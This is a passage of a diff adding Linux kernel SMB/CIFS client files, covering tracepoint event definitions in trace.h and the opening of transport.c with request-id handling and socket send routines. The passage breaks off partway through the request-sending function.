++	TP_PROTO(__u16	cmd,
++		__u64	mid,
++		__u32	pid,
++		unsigned long when_sent,
++		unsigned long when_received),
++	TP_ARGS(cmd, mid, pid, when_sent, when_received),
++	TP_STRUCT__entry(
++		__field(__u16, cmd)
++		__field(__u64, mid)
++		__field(__u32, pid)
++		__field(unsigned long, when_sent)
++		__field(unsigned long, when_received)
++	),
++	TP_fast_assign(
++		__entry->cmd = cmd;
++		__entry->mid = mid;
++		__entry->pid = pid;
++		__entry->when_sent = when_sent;
++		__entry->when_received = when_received;
++	),
++	TP_printk("\tcmd=%u mid=%llu pid=%u when_sent=%lu when_rcv=%lu",
++		__entry->cmd, __entry->mid, __entry->pid, __entry->when_sent,
++		__entry->when_received)
++)
++
++#define DEFINE_SMB3_MID_EVENT(name)          \
++DEFINE_EVENT(smb3_mid_class, smb3_##name,    \
++	TP_PROTO(__u16	cmd,			\
++		__u64	mid,			\
++		__u32	pid,			\
++		unsigned long when_sent,	\
++		unsigned long when_received),	\
++	TP_ARGS(cmd, mid, pid, when_sent, when_received))
++
++DEFINE_SMB3_MID_EVENT(slow_rsp);
++
++DECLARE_EVENT_CLASS(smb3_exit_err_class,
++	TP_PROTO(unsigned int xid,
++		const char *func_name,
++		int	rc),
++	TP_ARGS(xid, func_name, rc),
++	TP_STRUCT__entry(
++		__field(unsigned int, xid)
++		__string(func_name, func_name)
++		__field(int, rc)
++	),
++	TP_fast_assign(
++		__entry->xid = xid;
++		__assign_str(func_name, func_name);
++		__entry->rc = rc;
++	),
++	TP_printk("\t%s: xid=%u rc=%d",
++		__get_str(func_name), __entry->xid, __entry->rc)
++)
++
++#define DEFINE_SMB3_EXIT_ERR_EVENT(name)          \
++DEFINE_EVENT(smb3_exit_err_class, smb3_##name,    \
++	TP_PROTO(unsigned int xid,		\
++		const char *func_name,		\
++		int	rc),			\
++	TP_ARGS(xid, func_name, rc))
++
++DEFINE_SMB3_EXIT_ERR_EVENT(exit_err);
++
++
++DECLARE_EVENT_CLASS(smb3_sync_err_class,
++	TP_PROTO(unsigned long ino,
++		int	rc),
++	TP_ARGS(ino, rc),
++	TP_STRUCT__entry(
++		__field(unsigned long, ino)
++		__field(int, rc)
++	),
++	TP_fast_assign(
++		__entry->ino = ino;
++		__entry->rc = rc;
++	),
++	TP_printk("\tino=%lu rc=%d",
++		__entry->ino, __entry->rc)
++)
++
++#define DEFINE_SMB3_SYNC_ERR_EVENT(name)          \
++DEFINE_EVENT(smb3_sync_err_class, cifs_##name,    \
++	TP_PROTO(unsigned long ino,		\
++		int	rc),			\
++	TP_ARGS(ino, rc))
++
++DEFINE_SMB3_SYNC_ERR_EVENT(fsync_err);
++DEFINE_SMB3_SYNC_ERR_EVENT(flush_err);
++
++
++DECLARE_EVENT_CLASS(smb3_enter_exit_class,
++	TP_PROTO(unsigned int xid,
++		const char *func_name),
++	TP_ARGS(xid, func_name),
++	TP_STRUCT__entry(
++		__field(unsigned int, xid)
++		__string(func_name, func_name)
++	),
++	TP_fast_assign(
++		__entry->xid = xid;
++		__assign_str(func_name, func_name);
++	),
++	TP_printk("\t%s: xid=%u",
++		__get_str(func_name), __entry->xid)
++)
++
++#define DEFINE_SMB3_ENTER_EXIT_EVENT(name)        \
++DEFINE_EVENT(smb3_enter_exit_class, smb3_##name,  \
++	TP_PROTO(unsigned int xid,		\
++		const char *func_name),		\
++	TP_ARGS(xid, func_name))
++
++DEFINE_SMB3_ENTER_EXIT_EVENT(enter);
++DEFINE_SMB3_ENTER_EXIT_EVENT(exit_done);
++
++/*
++ * For SMB2/SMB3 tree connect
++ */
++
++DECLARE_EVENT_CLASS(smb3_tcon_class,
++	TP_PROTO(unsigned int xid,
++		__u32	tid,
++		__u64	sesid,
++		const char *unc_name,
++		int	rc),
++	TP_ARGS(xid, tid, sesid, unc_name, rc),
++	TP_STRUCT__entry(
++		__field(unsigned int, xid)
++		__field(__u32, tid)
++		__field(__u64, sesid)
++		__string(name, unc_name)
++		__field(int, rc)
++	),
++	TP_fast_assign(
++		__entry->xid = xid;
++		__entry->tid = tid;
++		__entry->sesid = sesid;
++		__assign_str(name, unc_name);
++		__entry->rc = rc;
++	),
++	TP_printk("xid=%u sid=0x%llx tid=0x%x unc_name=%s rc=%d",
++		__entry->xid, __entry->sesid, __entry->tid,
++		__get_str(name), __entry->rc)
++)
++
++#define DEFINE_SMB3_TCON_EVENT(name)          \
++DEFINE_EVENT(smb3_tcon_class, smb3_##name,    \
++	TP_PROTO(unsigned int xid,		\
++		__u32	tid,			\
++		__u64	sesid,			\
++		const char *unc_name,		\
++		int	rc),			\
++	TP_ARGS(xid, tid, sesid, unc_name, rc))
++
++DEFINE_SMB3_TCON_EVENT(tcon);
++
++
++/*
++ * For smb2/smb3 open (including create and mkdir) calls
++ */
++
++DECLARE_EVENT_CLASS(smb3_open_enter_class,
++	TP_PROTO(unsigned int xid,
++		__u32	tid,
++		__u64	sesid,
++		const char *full_path,
++		int	create_options,
++		int	desired_access),
++	TP_ARGS(xid, tid, sesid, full_path, create_options, desired_access),
++	TP_STRUCT__entry(
++		__field(unsigned int, xid)
++		__field(__u32, tid)
++		__field(__u64, sesid)
++		__string(path, full_path)
++		__field(int, create_options)
++		__field(int, desired_access)
++	),
++	TP_fast_assign(
++		__entry->xid = xid;
++		__entry->tid = tid;
++		__entry->sesid = sesid;
++		__assign_str(path, full_path);
++		__entry->create_options = create_options;
++		__entry->desired_access = desired_access;
++	),
++	TP_printk("xid=%u sid=0x%llx tid=0x%x path=%s cr_opts=0x%x des_access=0x%x",
++		__entry->xid, __entry->sesid, __entry->tid, __get_str(path),
++		__entry->create_options, __entry->desired_access)
++)
++
++#define DEFINE_SMB3_OPEN_ENTER_EVENT(name)        \
++DEFINE_EVENT(smb3_open_enter_class, smb3_##name,  \
++	TP_PROTO(unsigned int xid,		\
++		__u32	tid,			\
++		__u64	sesid,			\
++		const char *full_path,		\
++		int	create_options,		\
++		int	desired_access),	\
++	TP_ARGS(xid, tid, sesid, full_path, create_options, desired_access))
++
++DEFINE_SMB3_OPEN_ENTER_EVENT(open_enter);
++DEFINE_SMB3_OPEN_ENTER_EVENT(posix_mkdir_enter);
++
++DECLARE_EVENT_CLASS(smb3_open_err_class,
++	TP_PROTO(unsigned int xid,
++		__u32	tid,
++		__u64	sesid,
++		int	create_options,
++		int	desired_access,
++		int	rc),
++	TP_ARGS(xid, tid, sesid, create_options, desired_access, rc),
++	TP_STRUCT__entry(
++		__field(unsigned int, xid)
++		__field(__u32, tid)
++		__field(__u64, sesid)
++		__field(int,   create_options)
++		__field(int, desired_access)
++		__field(int, rc)
++	),
++	TP_fast_assign(
++		__entry->xid = xid;
++		__entry->tid = tid;
++		__entry->sesid = sesid;
++		__entry->create_options = create_options;
++		__entry->desired_access = desired_access;
++		__entry->rc = rc;
++	),
++	TP_printk("xid=%u sid=0x%llx tid=0x%x cr_opts=0x%x des_access=0x%x rc=%d",
++		__entry->xid, __entry->sesid, __entry->tid,
++		__entry->create_options, __entry->desired_access, __entry->rc)
++)
++
++#define DEFINE_SMB3_OPEN_ERR_EVENT(name)          \
++DEFINE_EVENT(smb3_open_err_class, smb3_##name,    \
++	TP_PROTO(unsigned int xid,		\
++		__u32	tid,			\
++		__u64	sesid,			\
++		int	create_options,		\
++		int	desired_access,		\
++		int	rc),			\
++	TP_ARGS(xid, tid, sesid, create_options, desired_access, rc))
++
++DEFINE_SMB3_OPEN_ERR_EVENT(open_err);
++DEFINE_SMB3_OPEN_ERR_EVENT(posix_mkdir_err);
++
++DECLARE_EVENT_CLASS(smb3_open_done_class,
++	TP_PROTO(unsigned int xid,
++		__u64	fid,
++		__u32	tid,
++		__u64	sesid,
++		int	create_options,
++		int	desired_access),
++	TP_ARGS(xid, fid, tid, sesid, create_options, desired_access),
++	TP_STRUCT__entry(
++		__field(unsigned int, xid)
++		__field(__u64, fid)
++		__field(__u32, tid)
++		__field(__u64, sesid)
++		__field(int, create_options)
++		__field(int, desired_access)
++	),
++	TP_fast_assign(
++		__entry->xid = xid;
++		__entry->fid = fid;
++		__entry->tid = tid;
++		__entry->sesid = sesid;
++		__entry->create_options = create_options;
++		__entry->desired_access = desired_access;
++	),
++	TP_printk("xid=%u sid=0x%llx tid=0x%x fid=0x%llx cr_opts=0x%x des_access=0x%x",
++		__entry->xid, __entry->sesid, __entry->tid, __entry->fid,
++		__entry->create_options, __entry->desired_access)
++)
++
++#define DEFINE_SMB3_OPEN_DONE_EVENT(name)        \
++DEFINE_EVENT(smb3_open_done_class, smb3_##name,  \
++	TP_PROTO(unsigned int xid,		\
++		__u64	fid,			\
++		__u32	tid,			\
++		__u64	sesid,			\
++		int	create_options,		\
++		int	desired_access),	\
++	TP_ARGS(xid, fid, tid, sesid, create_options, desired_access))
++
++DEFINE_SMB3_OPEN_DONE_EVENT(open_done);
++DEFINE_SMB3_OPEN_DONE_EVENT(posix_mkdir_done);
++
++
++DECLARE_EVENT_CLASS(smb3_lease_done_class,
++	TP_PROTO(__u32	lease_state,
++		__u32	tid,
++		__u64	sesid,
++		__u64	lease_key_low,
++		__u64	lease_key_high),
++	TP_ARGS(lease_state, tid, sesid, lease_key_low, lease_key_high),
++	TP_STRUCT__entry(
++		__field(__u32, lease_state)
++		__field(__u32, tid)
++		__field(__u64, sesid)
++		__field(__u64, lease_key_low)
++		__field(__u64, lease_key_high)
++	),
++	TP_fast_assign(
++		__entry->lease_state = lease_state;
++		__entry->tid = tid;
++		__entry->sesid = sesid;
++		__entry->lease_key_low = lease_key_low;
++		__entry->lease_key_high = lease_key_high;
++	),
++	TP_printk("sid=0x%llx tid=0x%x lease_key=0x%llx%llx lease_state=0x%x",
++		__entry->sesid, __entry->tid, __entry->lease_key_high,
++		__entry->lease_key_low, __entry->lease_state)
++)
++
++#define DEFINE_SMB3_LEASE_DONE_EVENT(name)        \
++DEFINE_EVENT(smb3_lease_done_class, smb3_##name,  \
++	TP_PROTO(__u32	lease_state,		\
++		__u32	tid,			\
++		__u64	sesid,			\
++		__u64	lease_key_low,		\
++		__u64	lease_key_high),	\
++	TP_ARGS(lease_state, tid, sesid, lease_key_low, lease_key_high))
++
++DEFINE_SMB3_LEASE_DONE_EVENT(lease_done);
++DEFINE_SMB3_LEASE_DONE_EVENT(lease_not_found);
++
++DECLARE_EVENT_CLASS(smb3_lease_err_class,
++	TP_PROTO(__u32	lease_state,
++		__u32	tid,
++		__u64	sesid,
++		__u64	lease_key_low,
++		__u64	lease_key_high,
++		int	rc),
++	TP_ARGS(lease_state, tid, sesid, lease_key_low, lease_key_high, rc),
++	TP_STRUCT__entry(
++		__field(__u32, lease_state)
++		__field(__u32, tid)
++		__field(__u64, sesid)
++		__field(__u64, lease_key_low)
++		__field(__u64, lease_key_high)
++		__field(int, rc)
++	),
++	TP_fast_assign(
++		__entry->lease_state = lease_state;
++		__entry->tid = tid;
++		__entry->sesid = sesid;
++		__entry->lease_key_low = lease_key_low;
++		__entry->lease_key_high = lease_key_high;
++		__entry->rc = rc;
++	),
++	TP_printk("sid=0x%llx tid=0x%x lease_key=0x%llx%llx lease_state=0x%x rc=%d",
++		__entry->sesid, __entry->tid, __entry->lease_key_high,
++		__entry->lease_key_low, __entry->lease_state, __entry->rc)
++)
++
++#define DEFINE_SMB3_LEASE_ERR_EVENT(name)        \
++DEFINE_EVENT(smb3_lease_err_class, smb3_##name,  \
++	TP_PROTO(__u32	lease_state,		\
++		__u32	tid,			\
++		__u64	sesid,			\
++		__u64	lease_key_low,		\
++		__u64	lease_key_high,		\
++		int	rc),			\
++	TP_ARGS(lease_state, tid, sesid, lease_key_low, lease_key_high, rc))
++
++DEFINE_SMB3_LEASE_ERR_EVENT(lease_err);
++
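++/* For logging establishment of a connection to a server */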
++DECLARE_EVENT_CLASS(smb3_connect_class,
++	TP_PROTO(char *hostname,
++		__u64 conn_id,
++		const struct __kernel_sockaddr_storage *dst_addr),
++	TP_ARGS(hostname, conn_id, dst_addr),
++	TP_STRUCT__entry(
++		__string(hostname, hostname)
++		__field(__u64, conn_id)
++		__array(__u8, dst_addr, sizeof(struct sockaddr_storage))
++	),
++	TP_fast_assign(
++		struct sockaddr_storage *pss = NULL;
++
++		__entry->conn_id = conn_id;
++		pss = (struct sockaddr_storage *)__entry->dst_addr;
++		*pss = *dst_addr;
++		__assign_str(hostname, hostname);
++	),
++	TP_printk("conn_id=0x%llx server=%s addr=%pISpsfc",
++		__entry->conn_id,
++		__get_str(hostname),
++		__entry->dst_addr)
++)
++
++#define DEFINE_SMB3_CONNECT_EVENT(name)        \
++DEFINE_EVENT(smb3_connect_class, smb3_##name,  \
++	TP_PROTO(char *hostname,		\
++		__u64 conn_id,			\
++		const struct __kernel_sockaddr_storage *addr),	\
++	TP_ARGS(hostname, conn_id, addr))
++
++DEFINE_SMB3_CONNECT_EVENT(connect_done);
++
++DECLARE_EVENT_CLASS(smb3_connect_err_class,
++	TP_PROTO(char *hostname, __u64 conn_id,
++		const struct __kernel_sockaddr_storage *dst_addr, int rc),
++	TP_ARGS(hostname, conn_id, dst_addr, rc),
++	TP_STRUCT__entry(
++		__string(hostname, hostname)
++		__field(__u64, conn_id)
++		__array(__u8, dst_addr, sizeof(struct sockaddr_storage))
++		__field(int, rc)
++	),
++	TP_fast_assign(
++		struct sockaddr_storage *pss = NULL;
++
++		__entry->conn_id = conn_id;
++		__entry->rc = rc;
++		pss = (struct sockaddr_storage *)__entry->dst_addr;
++		*pss = *dst_addr;
++		__assign_str(hostname, hostname);
++	),
++	TP_printk("rc=%d conn_id=0x%llx server=%s addr=%pISpsfc",
++		__entry->rc,
++		__entry->conn_id,
++		__get_str(hostname),
++		__entry->dst_addr)
++)
++
++#define DEFINE_SMB3_CONNECT_ERR_EVENT(name)        \
++DEFINE_EVENT(smb3_connect_err_class, smb3_##name,  \
++	TP_PROTO(char *hostname,		\
++		__u64 conn_id,			\
++		const struct __kernel_sockaddr_storage *addr,	\
++		int rc),			\
++	TP_ARGS(hostname, conn_id, addr, rc))
++
++DEFINE_SMB3_CONNECT_ERR_EVENT(connect_err);
++
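++/* For logging reconnects to a server */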
++DECLARE_EVENT_CLASS(smb3_reconnect_class,
++	TP_PROTO(__u64	currmid,
++		__u64 conn_id,
++		char *hostname),
++	TP_ARGS(currmid, conn_id, hostname),
++	TP_STRUCT__entry(
++		__field(__u64, currmid)
++		__field(__u64, conn_id)
++		__string(hostname, hostname)
++	),
++	TP_fast_assign(
++		__entry->currmid = currmid;
++		__entry->conn_id = conn_id;
++		__assign_str(hostname, hostname);
++	),
++	TP_printk("conn_id=0x%llx server=%s current_mid=%llu",
++		__entry->conn_id,
++		__get_str(hostname),
++		__entry->currmid)
++)
++
++#define DEFINE_SMB3_RECONNECT_EVENT(name)        \
++DEFINE_EVENT(smb3_reconnect_class, smb3_##name,  \
++	TP_PROTO(__u64	currmid,		\
++		__u64 conn_id,			\
++		char *hostname),				\
++	TP_ARGS(currmid, conn_id, hostname))
++
++DEFINE_SMB3_RECONNECT_EVENT(reconnect);
++DEFINE_SMB3_RECONNECT_EVENT(partial_send_reconnect);
++
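++/* For logging changes to the number of available credits (SMB3 flow control) */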
++DECLARE_EVENT_CLASS(smb3_credit_class,
++	TP_PROTO(__u64	currmid,
++		__u64 conn_id,
++		char *hostname,
++		int credits,
++		int credits_to_add,
++		int in_flight),
++	TP_ARGS(currmid, conn_id, hostname, credits, credits_to_add, in_flight),
++	TP_STRUCT__entry(
++		__field(__u64, currmid)
++		__field(__u64, conn_id)
++		__string(hostname, hostname)
++		__field(int, credits)
++		__field(int, credits_to_add)
++		__field(int, in_flight)
++	),
++	TP_fast_assign(
++		__entry->currmid = currmid;
++		__entry->conn_id = conn_id;
++		__assign_str(hostname, hostname);
++		__entry->credits = credits;
++		__entry->credits_to_add = credits_to_add;
++		__entry->in_flight = in_flight;
++	),
++	TP_printk("conn_id=0x%llx server=%s current_mid=%llu "
++			"credits=%d credit_change=%d in_flight=%d",
++		__entry->conn_id,
++		__get_str(hostname),
++		__entry->currmid,
++		__entry->credits,
++		__entry->credits_to_add,
++		__entry->in_flight)
++)
++
++#define DEFINE_SMB3_CREDIT_EVENT(name)        \
++DEFINE_EVENT(smb3_credit_class, smb3_##name,  \
++	TP_PROTO(__u64	currmid,		\
++		__u64 conn_id,			\
++		char *hostname,			\
++		int  credits,			\
++		int  credits_to_add,	\
++		int in_flight),			\
++	TP_ARGS(currmid, conn_id, hostname, credits, credits_to_add, in_flight))
++
++DEFINE_SMB3_CREDIT_EVENT(reconnect_with_invalid_credits);
++DEFINE_SMB3_CREDIT_EVENT(reconnect_detected);
++DEFINE_SMB3_CREDIT_EVENT(credit_timeout);
++DEFINE_SMB3_CREDIT_EVENT(insufficient_credits);
++DEFINE_SMB3_CREDIT_EVENT(too_many_credits);
++DEFINE_SMB3_CREDIT_EVENT(add_credits);
++DEFINE_SMB3_CREDIT_EVENT(adj_credits);
++DEFINE_SMB3_CREDIT_EVENT(hdr_credits);
++DEFINE_SMB3_CREDIT_EVENT(nblk_credits);
++DEFINE_SMB3_CREDIT_EVENT(pend_credits);
++DEFINE_SMB3_CREDIT_EVENT(wait_credits);
++DEFINE_SMB3_CREDIT_EVENT(waitff_credits);
++DEFINE_SMB3_CREDIT_EVENT(overflow_credits);
++DEFINE_SMB3_CREDIT_EVENT(set_credits);
++
++#endif /* _CIFS_TRACE_H */
++
++#undef TRACE_INCLUDE_PATH
++#define TRACE_INCLUDE_PATH .
++#define TRACE_INCLUDE_FILE trace
++#include <trace/define_trace.h>
+diff --git a/fs/smb/client/transport.c b/fs/smb/client/transport.c
+new file mode 100644
+index 0000000000000..c961b90f92b9f
+--- /dev/null
++++ b/fs/smb/client/transport.c
+@@ -0,0 +1,1807 @@
++// SPDX-License-Identifier: LGPL-2.1
++/*
++ *
++ *   Copyright (C) International Business Machines  Corp., 2002,2008
++ *   Author(s): Steve French (sfrench@us.ibm.com)
++ *   Jeremy Allison (jra@samba.org) 2006.
++ *
++ */
++
++#include <linux/fs.h>
++#include <linux/list.h>
++#include <linux/gfp.h>
++#include <linux/wait.h>
++#include <linux/net.h>
++#include <linux/delay.h>
++#include <linux/freezer.h>
++#include <linux/tcp.h>
++#include <linux/bvec.h>
++#include <linux/highmem.h>
++#include <linux/uaccess.h>
++#include <asm/processor.h>
++#include <linux/mempool.h>
++#include <linux/sched/signal.h>
++#include <linux/task_io_accounting_ops.h>
++#include "cifspdu.h"
++#include "cifsglob.h"
++#include "cifsproto.h"
++#include "cifs_debug.h"
++#include "smb2proto.h"
++#include "smbdirect.h"
++
++/* Max number of iovectors we can use off the stack when sending requests. */
++#define CIFS_MAX_IOV_SIZE 8
++
++void
++cifs_wake_up_task(struct mid_q_entry *mid)
++{
++	wake_up_process(mid->callback_data);
++}
++
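++/* Allocate and initialize a mid (multiplex id) entry for an outgoing request */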
++static struct mid_q_entry *
++alloc_mid(const struct smb_hdr *smb_buffer, struct TCP_Server_Info *server)
++{
++	struct mid_q_entry *temp;
++
++	if (server == NULL) {
++		cifs_dbg(VFS, "%s: null TCP session\n", __func__);
++		return NULL;
++	}
++
++	temp = mempool_alloc(cifs_mid_poolp, GFP_NOFS);
++	memset(temp, 0, sizeof(struct mid_q_entry));
++	kref_init(&temp->refcount);
++	temp->mid = get_mid(smb_buffer);
++	temp->pid = current->pid;
++	temp->command = cpu_to_le16(smb_buffer->Command);
++	cifs_dbg(FYI, "For smb_command %d\n", smb_buffer->Command);
++	/*	do_gettimeofday(&temp->when_sent);*/ /* easier to use jiffies */
++	/* the time the mid is allocated can be before the time it is sent */
++	temp->when_alloc = jiffies;
++	temp->server = server;
++
++	/*
++	 * The default is for the mid to be synchronous, so the
++	 * default callback just wakes up the current task.
++	 */
++	get_task_struct(current);
++	temp->creator = current;
++	temp->callback = cifs_wake_up_task;
++	temp->callback_data = current;
++
++	atomic_inc(&mid_count);
++	temp->mid_state = MID_REQUEST_ALLOCATED;
++	return temp;
++}
++
++static void __release_mid(struct kref *refcount)
++{
++	struct mid_q_entry *midEntry =
++			container_of(refcount, struct mid_q_entry, refcount);
++#ifdef CONFIG_CIFS_STATS2
++	__le16 command = midEntry->server->vals->lock_cmd;
++	__u16 smb_cmd = le16_to_cpu(midEntry->command);
++	unsigned long now;
++	unsigned long roundtrip_time;
++#endif
++	struct TCP_Server_Info *server = midEntry->server;
++
++	if (midEntry->resp_buf && (midEntry->mid_flags & MID_WAIT_CANCELLED) &&
++	    midEntry->mid_state == MID_RESPONSE_RECEIVED &&
++	    server->ops->handle_cancelled_mid)
++		server->ops->handle_cancelled_mid(midEntry, server);
++
++	midEntry->mid_state = MID_FREE;
++	atomic_dec(&mid_count);
++	if (midEntry->large_buf)
++		cifs_buf_release(midEntry->resp_buf);
++	else
++		cifs_small_buf_release(midEntry->resp_buf);
++#ifdef CONFIG_CIFS_STATS2
++	now = jiffies;
++	if (now < midEntry->when_alloc)
++		cifs_server_dbg(VFS, "Invalid mid allocation time\n");
++	roundtrip_time = now - midEntry->when_alloc;
++
++	if (smb_cmd < NUMBER_OF_SMB2_COMMANDS) {
++		if (atomic_read(&server->num_cmds[smb_cmd]) == 0) {
++			server->slowest_cmd[smb_cmd] = roundtrip_time;
++			server->fastest_cmd[smb_cmd] = roundtrip_time;
++		} else {
++			if (server->slowest_cmd[smb_cmd] < roundtrip_time)
++				server->slowest_cmd[smb_cmd] = roundtrip_time;
++			else if (server->fastest_cmd[smb_cmd] > roundtrip_time)
++				server->fastest_cmd[smb_cmd] = roundtrip_time;
++		}
++		cifs_stats_inc(&server->num_cmds[smb_cmd]);
++		server->time_per_cmd[smb_cmd] += roundtrip_time;
++	}
++	/*
++	 * commands taking longer than one second (default) can be indications
++	 * that something is wrong, unless it is quite a slow link or a very
++	 * busy server. Note that this calculation is unlikely or impossible
++	 * to wrap as long as slow_rsp_threshold is not set far above the
++	 * recommended maximum value (32767, i.e. 9 hours), and it is generally
++	 * harmless even if wrong since it only affects debug counters - so we
++	 * leave the calculation as a simple comparison rather than doing
++	 * multiple conversions and overflow checks.
++	 */
++	if ((slow_rsp_threshold != 0) &&
++	    time_after(now, midEntry->when_alloc + (slow_rsp_threshold * HZ)) &&
++	    (midEntry->command != command)) {
++		/*
++		 * smb2slowcmd[NUMBER_OF_SMB2_COMMANDS] counts by command
++		 * NB: le16_to_cpu returns unsigned so it cannot be negative below
++		 */
++		if (smb_cmd < NUMBER_OF_SMB2_COMMANDS)
++			cifs_stats_inc(&server->smb2slowcmd[smb_cmd]);
++
++		trace_smb3_slow_rsp(smb_cmd, midEntry->mid, midEntry->pid,
++			       midEntry->when_sent, midEntry->when_received);
++		if (cifsFYI & CIFS_TIMER) {
++			pr_debug("slow rsp: cmd %d mid %llu",
++				 midEntry->command, midEntry->mid);
++			cifs_info("A: 0x%lx S: 0x%lx R: 0x%lx\n",
++				  now - midEntry->when_alloc,
++				  now - midEntry->when_sent,
++				  now - midEntry->when_received);
++		}
++	}
++#endif
++	put_task_struct(midEntry->creator);
++
++	mempool_free(midEntry, cifs_mid_poolp);
++}
++
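++/* Drop a reference to the mid; it is freed once the last reference is put */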
++void release_mid(struct mid_q_entry *mid)
++{
++	struct TCP_Server_Info *server = mid->server;
++
++	spin_lock(&server->mid_lock);
++	kref_put(&mid->refcount, __release_mid);
++	spin_unlock(&server->mid_lock);
++}
++
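++/* Remove the mid from the pending queue (if still queued) and drop a reference */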
++void
++delete_mid(struct mid_q_entry *mid)
++{
++	spin_lock(&mid->server->mid_lock);
++	if (!(mid->mid_flags & MID_DELETED)) {
++		list_del_init(&mid->qhead);
++		mid->mid_flags |= MID_DELETED;
++	}
++	spin_unlock(&mid->server->mid_lock);
++
++	release_mid(mid);
++}
++
++/*
++ * smb_send_kvec - send an array of kvecs to the server
++ * @server:	Server to send the data to
++ * @smb_msg:	Message to send
++ * @sent:	amount of data sent on socket is stored here
++ *
++ * Our basic "send data to server" function. Should be called with srv_mutex
++ * held. The caller is responsible for handling the results.
++ */
++static int
++smb_send_kvec(struct TCP_Server_Info *server, struct msghdr *smb_msg,
++	      size_t *sent)
++{
++	int rc = 0;
++	int retries = 0;
++	struct socket *ssocket = server->ssocket;
++
++	*sent = 0;
++
++	if (server->noblocksnd)
++		smb_msg->msg_flags = MSG_DONTWAIT + MSG_NOSIGNAL;
++	else
++		smb_msg->msg_flags = MSG_NOSIGNAL;
++
++	while (msg_data_left(smb_msg)) {
++		/*
++		 * If blocking send, we try 3 times, since each can block
++		 * for 5 seconds. For nonblocking sends we have to try more
++		 * times, waiting increasing amounts of time to allow the
++		 * socket to clear.  The overall time we wait in either
++		 * case to send on the socket is about 15 seconds.
++		 * Similarly we wait for 15 seconds for a response from
++		 * the server in SendReceive[2] for the server to send
++		 * a response back for most types of requests (except
++		 * SMB Write past end of file which can be slow, and
++		 * blocking lock operations). NFS waits slightly longer
++		 * than CIFS, but this can make it take longer for
++		 * nonresponsive servers to be detected and 15 seconds
++		 * is more than enough time for modern networks to
++		 * send a packet.  In most cases if we fail to send
++		 * after the retries we will kill the socket and
++		 * reconnect which may clear the network problem.
++		 */
++		rc = sock_sendmsg(ssocket, smb_msg);
++		if (rc == -EAGAIN) {
++			retries++;
++			if (retries >= 14 ||
++			    (!server->noblocksnd && (retries > 2))) {
++				cifs_server_dbg(VFS, "sends on sock %p stuck for 15 seconds\n",
++					 ssocket);
++				return -EAGAIN;
++			}
++			msleep(1 << retries);
++			continue;
++		}
++
++		if (rc < 0)
++			return rc;
++
++		if (rc == 0) {
++			/* should never happen, letting socket clear before
++			   retrying is our only obvious option here */
++			cifs_server_dbg(VFS, "tcp sent no data\n");
++			msleep(500);
++			continue;
++		}
++
++		/* send was at least partially successful */
++		*sent += rc;
++		retries = 0; /* in case we get ENOSPC on the next send */
++	}
++	return 0;
++}
++
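++/* Return the total length of an smb_rqst on the wire, including any page array */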
++unsigned long
++smb_rqst_len(struct TCP_Server_Info *server, struct smb_rqst *rqst)
++{
++	unsigned int i;
++	struct kvec *iov;
++	int nvec;
++	unsigned long buflen = 0;
++
++	if (!is_smb1(server) && rqst->rq_nvec >= 2 &&
++	    rqst->rq_iov[0].iov_len == 4) {
++		iov = &rqst->rq_iov[1];
++		nvec = rqst->rq_nvec - 1;
++	} else {
++		iov = rqst->rq_iov;
++		nvec = rqst->rq_nvec;
++	}
++
++	/* total up iov array first */
++	for (i = 0; i < nvec; i++)
++		buflen += iov[i].iov_len;
++
++	/*
++	 * Add in the page array if there is one. The caller needs to make
++	 * sure rq_offset and rq_tailsz are set correctly. If a buffer of
++	 * multiple pages ends at a page boundary, rq_tailsz needs to be set to
++	 * PAGE_SIZE.
++	 */
++	if (rqst->rq_npages) {
++		if (rqst->rq_npages == 1)
++			buflen += rqst->rq_tailsz;
++		else {
++			/*
++			 * If there is more than one page, calculate the
++			 * buffer length based on rq_offset and rq_tailsz
++			 */
++			buflen += rqst->rq_pagesz * (rqst->rq_npages - 1) -
++					rqst->rq_offset;
++			buflen += rqst->rq_tailsz;
++		}
++	}
++
++	return buflen;
++}
++
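++/*
++ * Send one or more requests on the socket (or via RDMA), prefixing an
++ * RFC 1002 length marker for SMB2+ and blocking signals while sending.
++ */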
++static int
++__smb_send_rqst(struct TCP_Server_Info *server, int num_rqst,
++		struct smb_rqst *rqst)
++{
++	int rc;
++	struct kvec *iov;
++	int n_vec;
++	unsigned int send_length = 0;
++	unsigned int i, j;
++	sigset_t mask, oldmask;
++	size_t total_len = 0, sent, size;
++	struct socket *ssocket = server->ssocket;
++	struct msghdr smb_msg = {};
++	__be32 rfc1002_marker;
++
++	cifs_in_send_inc(server);
++	if (cifs_rdma_enabled(server)) {
++		/* return -EAGAIN when connecting or reconnecting */
++		rc = -EAGAIN;
++		if (server->smbd_conn)
++			rc = smbd_send(server, num_rqst, rqst);
++		goto smbd_done;
++	}
++
++	rc = -EAGAIN;
++	if (ssocket == NULL)
++		goto out;
++
++	rc = -ERESTARTSYS;
++	if (fatal_signal_pending(current)) {
++		cifs_dbg(FYI, "signal pending before send request\n");
++		goto out;
++	}
++
++	rc = 0;
++	/* cork the socket */
++	tcp_sock_set_cork(ssocket->sk, true);
++
++	for (j = 0; j < num_rqst; j++)
++		send_length += smb_rqst_len(server, &rqst[j]);
++	rfc1002_marker = cpu_to_be32(send_length);
++
++	/*
++	 * We should not allow signals to interrupt the network send because
++	 * any partial send will cause session reconnects, thus increasing
++	 * the latency of system calls and overloading the server with
++	 * unnecessary requests.
++	 */
++
++	sigfillset(&mask);
++	sigprocmask(SIG_BLOCK, &mask, &oldmask);
++
++	/* Generate a rfc1002 marker for SMB2+ */
++	if (!is_smb1(server)) {
++		struct kvec hiov = {
++			.iov_base = &rfc1002_marker,
++			.iov_len  = 4
++		};
++		iov_iter_kvec(&smb_msg.msg_iter, ITER_SOURCE, &hiov, 1, 4);
++		rc = smb_send_kvec(server, &smb_msg, &sent);
++		if (rc < 0)
++			goto unmask;
++
++		total_len += sent;
++		send_length += 4;
++	}
++
++	cifs_dbg(FYI, "Sending smb: smb_len=%u\n", send_length);
++
++	for (j = 0; j < num_rqst; j++) {
++		iov = rqst[j].rq_iov;
++		n_vec = rqst[j].rq_nvec;
++
++		size = 0;
++		for (i = 0; i < n_vec; i++) {
++			dump_smb(iov[i].iov_base, iov[i].iov_len);
++			size += iov[i].iov_len;
++		}
++
++		iov_iter_kvec(&smb_msg.msg_iter, ITER_SOURCE, iov, n_vec, size);
++
++		rc = smb_send_kvec(server, &smb_msg, &sent);
++		if (rc < 0)
++			goto unmask;
++
++		total_len += sent;
++
++		/* now walk the page array and send each page in it */
++		for (i = 0; i < rqst[j].rq_npages; i++) {
++			struct bio_vec bvec;
++
++			bvec.bv_page = rqst[j].rq_pages[i];
